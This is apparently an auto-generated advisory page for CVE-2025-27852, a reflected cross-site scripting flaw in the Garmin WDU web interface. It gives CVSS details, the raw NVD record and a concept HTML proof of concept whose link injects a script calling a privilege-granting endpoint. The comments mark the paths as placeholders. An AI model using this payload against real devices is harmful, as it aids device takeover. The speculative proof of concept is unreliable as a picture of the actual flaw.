Security Vulnerability Report
CVE-2025-27852 CVSS 5.0 MEDIUM

Published: 2026-05-13 21:16:41
Last Modified: 2026-05-14 17:06:09

Description

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is present in the record. Affected products, as stated in the description:

Garmin WDU v1 1.4.6
Garmin WDU v2 5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC Concept for CVE-2025-27852
     Description: Reflected XSS requiring user interaction (Click).
     Target: Garmin WDU Local Web Interface
     Note: <WDU_IP>, /vulnerable_page and /admin/grant_privilege are illustrative
     placeholders used by this concept page, not confirmed WDU paths. -->
<html>
<body>
  <h2>Garmin WDU XSS PoC</h2>
  <p>This page demonstrates the exploit vector. The victim must click the link below.</p>
  <!-- Simulating the vulnerable endpoint behavior -->
  <a href="http://<WDU_IP>/vulnerable_page?input=<script>alert('XSS');fetch('/admin/grant_privilege')</script>" target="_blank">
    Click here to view WDU status (Trigger Exploit)
  </a>
  <script>
    // Explanation:
    // 1. Attacker sends this link to the victim on the local network.
    // 2. The 'input' parameter is reflected unsanitized in the WDU response.
    // 3. The script tag executes, potentially calling internal APIs to grant admin access.
    console.log("PoC structure generated for local network delivery.");
  </script>
</body>
</html>

References

https://garmin.com
https://www8.garmin.com/support/ch.jsp?product=010-02642-00

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27852", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:41.350", "lastModified": "2026-05-14T17:06:08.693", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://garmin.com", "source": "[email protected]"}, {"url": "https://www8.garmin.com/support/ch.jsp?product=010-02642-00", "source": "[email protected]"}]}}